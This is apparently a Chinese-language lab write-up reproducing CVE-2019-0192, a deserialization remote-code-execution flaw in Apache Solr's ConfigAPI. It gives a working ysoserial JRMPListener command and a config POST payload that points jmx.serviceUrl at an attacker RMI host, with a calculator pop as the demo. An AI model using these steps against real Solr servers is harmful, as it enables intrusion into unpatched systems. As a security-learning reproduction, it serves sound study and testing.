CVE-2019-019

近日根据网上得教程复现了CVE-2019-0192这个漏洞
1.漏洞说明

描述：Apache Solr中的ConfigAPI允许设置一个jmx.serviceUrl，它将创建一个新的JMXConnectorServerFactory，并通过“绑定”操作触发对目标RMI/LDAP服务器的调用。恶意的RMI服务器可以响应任意的对象，这些对象将在Solr端使用java的ObjectInputStream反序列化，这被认为是不安全的。这种类型的漏洞可以利用ysoserial工具。根据目标类路径，攻击者可以使用其中一个“gadget chain”来触发Solr端上的远程代码执行。
原理：该漏洞本质是ConfigAPI允许通过HTTP POST请求配置Solr的JMX服务器。
受影响版本：Apache Solr < 7.0.0
安全版本：Apache Solr 7.0.0或者更高版本

2.实验环境
靶机环境：
靶机系统 Windows 10
JDK版本 jdk7u21
服务器 tomcat 7
Solr版本 solr–5.5.3
Solr 下载地址：http://archive.apache.org/dist/lucene/solr/5.5.3/
攻击机环境
攻击机系统 Windows 10
发包工具 burp
漏洞利用框架 ysoserial
下载地址：https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

3.攻击步骤及效果

(1)在靶机上将下载好的Solr安装成功后，启动Solr。
启动命令：solr -e techproducts --Dcom.sun.management.jmxremote

(2)启动后打开网页，输入网址 IP:8983

(3)攻击机切换到ysoserial目录下，打开CMD，输入命令
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1234 Jdk7u21 calc.exe

(4)我们的目标路径是 IP:8983/solr/techproducts/config （靶机）

(5)打开攻击机利用burp抓包，改包后进行发包完成攻击

改包，添加content-type,以及具体的payload如下图所示
{“set-property” :{“jmx.serviceUrl” :“service:jmx:rmi:///jndi/rmi://192.168.96.132:1234/obj”}}
点击Go,成功在靶机上弹出计算器

参考：https://github.com/mpgn/CVE-2019-0192/
https://www.bilibili.com/video/av46568453/
https://blog.csdn.net/yalecaltech/article/details/88829590